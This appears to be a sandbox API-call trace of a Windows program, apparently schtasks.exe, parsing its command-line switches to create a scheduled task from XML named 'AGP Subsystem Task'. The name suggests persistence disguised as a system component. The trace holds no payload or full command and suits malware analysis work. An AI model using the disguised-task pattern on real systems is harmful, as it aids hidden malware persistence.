[0170.446] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] lstrlenW (lpString="tn") returned 2
[0170.446] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|p|") returned 3
[0170.446] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.446] lstrlenW (lpString="|p|") returned 3
[0170.446] lstrlenW (lpString="|tn|") returned 4
[0170.446] SetLastError (dwErrCode=0x490)
[0170.446] lstrlenW (lpString="ru") returned 2
[0170.446] lstrlenW (lpString="ru") returned 2
[0170.446] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] lstrlenW (lpString="tn") returned 2
[0170.446] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ru|") returned 4
[0170.446] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.446] lstrlenW (lpString="|ru|") returned 4
[0170.447] lstrlenW (lpString="|tn|") returned 4
[0170.447] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0
[0170.447] SetLastError (dwErrCode=0x490)
[0170.447] lstrlenW (lpString="rp") returned 2
[0170.447] lstrlenW (lpString="rp") returned 2
[0170.447] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.447] lstrlenW (lpString="tn") returned 2
[0170.447] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.447] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|rp|") returned 4
[0170.447] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.447] lstrlenW (lpString="|rp|") returned 4
[0170.447] lstrlenW (lpString="|tn|") returned 4
[0170.447] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0
[0170.447] SetLastError (dwErrCode=0x490)
[0170.447] lstrlenW (lpString="sc") returned 2
[0170.447] lstrlenW (lpString="sc") returned 2
[0170.447] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.447] lstrlenW (lpString="tn") returned 2
[0170.447] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.447] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sc|") returned 4
[0170.447] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.447] lstrlenW (lpString="|sc|") returned 4
[0170.447] lstrlenW (lpString="|tn|") returned 4
[0170.447] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0
[0170.447] SetLastError (dwErrCode=0x490)
[0170.448] lstrlenW (lpString="mo") returned 2
[0170.448] lstrlenW (lpString="mo") returned 2
[0170.448] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.448] lstrlenW (lpString="tn") returned 2
[0170.448] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.448] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|mo|") returned 4
[0170.448] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.448] lstrlenW (lpString="|mo|") returned 4
[0170.448] lstrlenW (lpString="|tn|") returned 4
[0170.448] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0
[0170.448] SetLastError (dwErrCode=0x490)
[0170.448] lstrlenW (lpString="d") returned 1
[0170.448] lstrlenW (lpString="d") returned 1
[0170.448] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.448] lstrlenW (lpString="tn") returned 2
[0170.448] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.448] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|d|") returned 3
[0170.448] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.448] lstrlenW (lpString="|d|") returned 3
[0170.448] lstrlenW (lpString="|tn|") returned 4
[0170.448] SetLastError (dwErrCode=0x490)
[0170.448] lstrlenW (lpString="m") returned 1
[0170.449] lstrlenW (lpString="m") returned 1
[0170.449] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|m|") returned 3
[0170.449] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.449] lstrlenW (lpString="|m|") returned 3
[0170.449] lstrlenW (lpString="|tn|") returned 4
[0170.449] SetLastError (dwErrCode=0x490)
[0170.449] lstrlenW (lpString="i") returned 1
[0170.449] lstrlenW (lpString="i") returned 1
[0170.449] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|i|") returned 3
[0170.449] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.449] lstrlenW (lpString="|i|") returned 3
[0170.449] lstrlenW (lpString="|tn|") returned 4
[0170.449] SetLastError (dwErrCode=0x490)
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.450] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.450] lstrlenW (lpString="|tn|") returned 4
[0170.450] lstrlenW (lpString="|tn|") returned 4
[0170.450] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|"
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.450] lstrlenW (lpString="-/") returned 2
[0170.450] StrChrIW (lpStart="-/", wMatch=0x41) returned 0x0
[0170.450] SetLastError (dwErrCode=0x490)
[0170.450] SetLastError (dwErrCode=0x490)
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.450] StrChrIW (lpStart="AGP Subsystem Task", wMatch=0x3a) returned 0x0
[0170.450] SetLastError (dwErrCode=0x490)
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] lstrlenW (lpString="/xml") returned 4
[0170.450] lstrlenW (lpString="-/") returned 2
[0170.450] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.450] lstrlenW (lpString="create") returned 6
[0170.450] lstrlenW (lpString="create") returned 6
[0170.450] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.450] lstrlenW (lpString="xml") returned 3
[0170.451] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.451] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.451] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.451] lstrlenW (lpString="|create|") returned 8
[0170.451] lstrlenW (lpString="|xml|") returned 5
[0170.451] StrStrIW (lpFirst="|create|", lpSrch="|xml|") returned 0x0
[0170.451] SetLastError (dwErrCode=0x490)
[0170.451] lstrlenW (lpString="?") returned 1
[0170.451] lstrlenW (lpString="?") returned 1
[0170.451] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.451] lstrlenW (lpString="xml") returned 3
[0170.451] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.451] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|?|") returned 3
[0170.451] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.451] lstrlenW (lpString="|?|") returned 3
[0170.451] lstrlenW (lpString="|xml|") returned 5
[0170.451] SetLastError (dwErrCode=0x490)
[0170.451] lstrlenW (lpString="s") returned 1
[0170.451] lstrlenW (lpString="s") returned 1
[0170.451] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] lstrlenW (lpString="xml") returned 3
[0170.452] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|s|") returned 3
[0170.452] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.452] lstrlenW (lpString="|s|") returned 3
[0170.452] lstrlenW (lpString="|xml|") returned 5
[0170.452] SetLastError (dwErrCode=0x490)
[0170.452] lstrlenW (lpString="u") returned 1
[0170.452] lstrlenW (lpString="u") returned 1
[0170.452] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] lstrlenW (lpString="xml") returned 3
[0170.452] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|u|") returned 3
[0170.452] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.452] lstrlenW (lpString="|u|") returned 3
[0170.452] lstrlenW (lpString="|xml|") returned 5
[0170.452] SetLastError (dwErrCode=0x490)
[0170.452] lstrlenW (lpString="p") returned 1
[0170.452] lstrlenW (lpString="p") returned 1
[0170.452] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] lstrlenW (lpString="xml") returned 3
[0170.452] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|p|") returned 3
[0170.452] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.452] lstrlenW (lpString="|p|") returned 3
[0170.453] lstrlenW (lpString="|xml|") returned 5
[0170.453] SetLastError (dwErrCode=0x490)
[0170.453] lstrlenW (lpString="ru") returned 2
[0170.453] lstrlenW (lpString="ru") returned 2
[0170.453] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.453] lstrlenW (lpString="xml") returned 3
[0170.453] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.453] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ru|") returned 4
[0170.453] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.453] lstrlenW (lpString="|ru|") returned 4
[0170.453] lstrlenW (lpString="|xml|") returned 5
[0170.453] SetLastError (dwErrCode=0x490)
[0170.453] lstrlenW (lpString="rp") returned 2
[0170.453] lstrlenW (lpString="rp") returned 2
[0170.453] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.453] lstrlenW (lpString="xml") returned 3
[0170.453] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.453] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|rp|") returned 4
[0170.453] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.453] lstrlenW (lpString="|rp|") returned 4
[0170.453] lstrlenW (lpString="|xml|") returned 5
[0170.453] SetLastError (dwErrCode=0x490)
[0170.453] lstrlenW (lpString="sc") returned 2
[0170.453] lstrlenW (lpString="sc") returned 2
[0170.454] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] lstrlenW (lpString="xml") returned 3
[0170.454] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sc|") returned 4
[0170.454] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.454] lstrlenW (lpString="|sc|") returned 4
[0170.454] lstrlenW (lpString="|xml|") returned 5
[0170.454] SetLastError (dwErrCode=0x490)
[0170.454] lstrlenW (lpString="mo") returned 2
[0170.454] lstrlenW (lpString="mo") returned 2
[0170.454] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] lstrlenW (lpString="xml") returned 3
[0170.454] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|mo|") returned 4
[0170.454] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.454] lstrlenW (lpString="|mo|") returned 4
[0170.454] lstrlenW (lpString="|xml|") returned 5
[0170.454] SetLastError (dwErrCode=0x490)
[0170.454] lstrlenW (lpString="d") returned 1
[0170.454] lstrlenW (lpString="d") returned 1
[0170.454] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] lstrlenW (lpString="xml") returned 3
[0170.454] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|d|") returned 3
[0170.454] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.454] lstrlenW (lpString="|d|") returned 3
[0170.454] lstrlenW (lpString="|xml|") returned 5
[0170.455] SetLastError (dwErrCode=0x490)
[0170.455] lstrlenW (lpString="m") returned 1
[0170.455] lstrlenW (lpString="m") returned 1
[0170.455] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] lstrlenW (lpString="xml") returned 3
[0170.455] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|m|") returned 3
[0170.455] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.455] lstrlenW (lpString="|m|") returned 3
[0170.455] lstrlenW (lpString="|xml|") returned 5
[0170.455] SetLastError (dwErrCode=0x490)
[0170.455] lstrlenW (lpString="i") returned 1
[0170.455] lstrlenW (lpString="i") returned 1
[0170.455] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] lstrlenW (lpString="xml") returned 3
[0170.455] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|i|") returned 3
[0170.455] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.455] lstrlenW (lpString="|i|") returned 3
[0170.455] lstrlenW (lpString="|xml|") returned 5
[0170.455] SetLastError (dwErrCode=0x490)
[0170.455] lstrlenW (lpString="tn") returned 2
[0170.455] lstrlenW (lpString="tn") returned 2
[0170.455] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] lstrlenW (lpString="xml") returned 3
[0170.455] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.456] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.456] lstrlenW (lpString="|tn|") returned 4
[0170.456] lstrlenW (lpString="|xml|") returned 5
[0170.456] SetLastError (dwErrCode=0x490)
[0170.456] lstrlenW (lpString="tr") returned 2
[0170.456] lstrlenW (lpString="tr") returned 2
[0170.456] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] lstrlenW (lpString="xml") returned 3
[0170.456] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tr|") returned 4
[0170.456] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.456] lstrlenW (lpString="|tr|") returned 4
[0170.456] lstrlenW (lpString="|xml|") returned 5
[0170.456] SetLastError (dwErrCode=0x490)
[0170.456] lstrlenW (lpString="st") returned 2
[0170.456] lstrlenW (lpString="st") returned 2
[0170.456] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] lstrlenW (lpString="xml") returned 3
[0170.456] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|st|") returned 4
[0170.456] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.456] lstrlenW (lpString="|st|") returned 4
[0170.456] lstrlenW (lpString="|xml|") returned 5
[0170.456] SetLastError (dwErrCode=0x490)
[0170.456] lstrlenW (lpString="sd") returned 2
[0170.456] lstrlenW (lpString="sd") returned 2
[0170.456] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] lstrlenW (lpString="xml") returned 3
[0170.456] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sd|") returned 4
[0170.457] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.457] lstrlenW (lpString="|sd|") returned 4
[0170.457] lstrlenW (lpString="|xml|") returned 5
[0170.457] SetLastError (dwErrCode=0x490)
[0170.457] lstrlenW (lpString="ed") returned 2
[0170.457] lstrlenW (lpString="ed") returned 2
[0170.457] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] lstrlenW (lpString="xml") returned 3
[0170.457] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ed|") returned 4
[0170.457] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.457] lstrlenW (lpString="|ed|") returned 4
[0170.457] lstrlenW (lpString="|xml|") returned 5
[0170.457] SetLastError (dwErrCode=0x490)
[0170.457] lstrlenW (lpString="it") returned 2
[0170.457] lstrlenW (lpString="it") returned 2
[0170.457] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] lstrlenW (lpString="xml") returned 3
[0170.457] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|it|") returned 4
[0170.457] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.457] lstrlenW (lpString="|it|") returned 4
[0170.457] lstrlenW (lpString="|xml|") returned 5
[0170.458] SetLastError (dwErrCode=0x490)
[0170.458] lstrlenW (lpString="et") returned 2
[0170.458] lstrlenW (lpString="et") returned 2
[0170.458] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.458] lstrlenW (lpString="xml") returned 3
[0170.458] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.458] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|et|") returned 4
[0170.458] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.458] lstrlenW (lpString="|et|") returned 4
[0170.458] lstrlenW (lpString="|xml|") returned 5
[0170.458] SetLastError (dwErrCode=0x490)
[0170.458] lstrlenW (lpString="k") returned 1
[0170.458] lstrlenW (lpString="k") returned 1
[0170.458] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.458] lstrlenW (lpString="xml") returned 3
[0170.458] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.458] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|k|") returned 3
[0170.458] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.458] lstrlenW (lpString="|k|") returned 3
[0170.458] lstrlenW (lpString="|xml|") returned 5
[0170.458] SetLastError (dwErrCode=0x490)
[0170.458] lstrlenW (lpString="du") returned 2
[0170.459] lstrlenW (lpString="du") returned 2
[0170.459] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.459] lstrlenW (lpString="xml") returned 3
[0170.459] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.459] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|du|") returned 4
[0170.459] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.459] lstrlenW (lpString="|du|") returned 4
[0170.459] lstrlenW (lpString="|xml|") returned 5
[0170.459] SetLastError (dwErrCode=0x490)
[0170.459] lstrlenW (lpString="ri") returned 2
[0170.459] lstrlenW (lpString="ri") returned 2
[0170.459] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.459] lstrlenW (lpString="xml") returned 3
[0170.459] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.459] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ri|") returned 4
[0170.459] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.459] lstrlenW (lpString="|ri|") returned 4
[0170.459] lstrlenW (lpString="|xml|") returned 5
[0170.459] SetLastError (dwErrCode=0x490)
[0170.460] lstrlenW (lpString="z") returned 1
[0170.460] lstrlenW (lpString="z") returned 1
[0170.460] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] lstrlenW (lpString="xml") returned 3
[0170.460] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|z|") returned 3
[0170.460] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.460] lstrlenW (lpString="|z|") returned 3
[0170.460] SetLastError (dwErrCode=0x490)
[0170.460] lstrlenW (lpString="f") returned 1
[0170.460] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.460] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.460] SetLastError (dwErrCode=0x490)
[0170.460] lstrlenW (lpString="v1") returned 2
[0170.460] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.460] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|v1|") returned 4
[0170.460] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.461] SetLastError (dwErrCode=0x490)
[0170.461] lstrlenW (lpString="xml") returned 3
[0170.461] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
